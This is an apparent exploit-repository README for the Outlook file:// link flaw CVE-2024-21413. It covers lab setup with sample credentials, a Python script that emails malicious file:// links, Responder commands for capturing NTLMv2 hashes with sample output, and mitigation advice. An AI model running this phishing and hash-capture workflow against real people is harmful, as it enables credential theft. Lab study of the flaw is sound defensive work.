## https://sploitus.com/exploit?id=5F6A2D1C-F3A2-50E3-AF23-AE35F65F53A8
#CVE-2024-21413 – Outlook LAB Vulnerability
Vulnerability Description
`CVE-2024-21413` is a critical vulnerability discovered in `Microsoft Outlook` that allows a remote attacker to execute malicious links via a carefully crafted email. This exploit uses the `file://` protocol to redirect victims to attacker-controlled `SMB` shares, which may result in exposure of `NTLM` credentials or unauthorized access to local files.
# Windows 10 Services Startup Script + Credentials
The password for user `victim` is `victim` in `Windows 10` lab and the password for server `hMailServer` is `victim`
The password for the `victim@victim.local` email is `victim` and the password for the `attacker@victim.local` email is `hacker`
Install `python3` in the `Windows 10` lab:
[Download Python3](https://www.microsoft.com/store/productId/9PNRBTZXMB4Z?ocid=pdpshare)
We will open a `cmd` as administrator:
```cmd
pip install pyautogui
pip install Pillow
pip install opencv-python
```
We will have to download the following script in the `Windows 10` laboratory:
```
startServicesWindows.py
```
```cmd
python3 startServicesWindows.py
```
To start the mail server and `Outlook`, in order to have the environment prepared.
# Technical Details
`Attack Vector`: The attack is initiated by sending an email with a `file://` link to the victim. When clicked, the system attempts to connect to the specified remote share, potentially exposing `NTLMv2` credentials or accessing a compromised local resource.
Impact: Theft of `NTLM` credentials, remote command execution or exploitation of local files.
## Requirements:
A functional `SMTP` server.
Access to the victim computer through `Outlook`.
Valid credentials of the email sender.
## Tools Included
This repository contains two tools designed for testing in a controlled environment:
## 1. Email Exploit Tool
A utility in `Python` that automates sending emails with malicious `file://` links to test the vulnerability in secure environments.
## Characteristics
Allows you to configure sender, recipient and sender password.
Link embedded in the body of the email that exploits the `file://` protocol.
Designed to run with an `SMTP` server.
## Use
Install the necessary dependencies:
```bash
pip install rich
```
### Run the tool:
```bash
python3 exploitSendEmailOutlook.py
```
### Provide the requested data:
Email address of the sender `(attacker)`.
Email address of the recipient `(victim)`.
`Password` of the sender.
IP of the `SMTP` server.
The email will be sent automatically if authentication and connection are successful.
### Output Example
```plaintext
Intentando conectar al servidor SMTP...
Conexión establecida con el servidor SMTP.
Intentando iniciar sesión en el servidor SMTP...
Autenticación exitosa.
Enviando correo...
Correo enviado exitosamente.
```
## 2. Responder Tool
Responder is an advanced penetration testing tool that acts as a `fake SMB` server to capture `NTLMv2` credentials when a system attempts to authenticate.
### Characteristics
Captures `NTLMv2` hashes from authentication attempts.
Support for multiple protocols `(SMB, HTTP, FTP, among others)`.
Ideal for testing this `vulnerability`.
### Use
Install `responder` on your attacking machine.
### On Debian/Ubuntu systems:
```bash
sudo apt update && sudo apt install responder
```
### Run Reply on your network interface:
```bash
sudo responder -I <NETWORK_INTERFACE> -v
```
Or also using my script:
```bash
python3 captureHashResponder.py
```
Keep the server running and wait for victims to access the malicious `file://` link sent.
### Output Example
```plaintext
[SMB] NTLMv2-SSP Client : 192.168.1.100
[SMB] NTLMv2-SSP Username : VICTIM-PC\user
[SMB] NTLMv2-SSP Hash : e5d5c82d3e44bf4...etc
```
## Mitigation Recommendations
Blocking the `file://` Protocol:
Configure your email client to avoid links that use the `file://` protocol.
Disable Automatic Submission of `NTLM` Credentials:
## On Windows systems:
Open the `Group Policy Editor`.
Navigate to `Security Settings` > `Local Policies` > `Security Options`.
Configure Network Security: Restrict use of `NTLM`: Deny outgoing `NTLM` traffic to remote servers.
Security Update:
Apply the latest security patches provided by `Microsoft`.
Use of Strong Passwords and Multi-Factor Authentication (MFA):
This minimizes the impact if credentials are compromised.
## Explanation video about the vulnerability in YT:
[Video CVE-2024-21413](LINK)
## Warning
This tool and included scripts are for educational purposes only and for testing in controlled environments with explicit permission. Misuse of these tools for malicious activities is `illegal` and subject to severe legal penalties.
## License
This project is distributed under the `MIT` License. See the `LICENSE` file for details.
## Contact
If you have questions or would like to collaborate, do not hesitate to contact me:
Author: `d1se0`
Mail: `ciberseguridad12345@gmail.com`